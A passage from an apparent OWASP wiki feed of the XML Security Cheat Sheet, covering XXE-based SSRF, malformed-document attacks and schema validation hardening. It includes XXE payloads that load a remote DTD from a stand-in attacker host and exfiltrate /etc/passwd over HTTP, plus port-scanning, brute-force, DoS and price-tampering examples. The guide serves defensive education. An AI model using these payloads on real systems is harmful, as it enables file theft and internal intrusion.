Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224432</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224432"/>
				<updated>2016-12-21T20:20:00Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
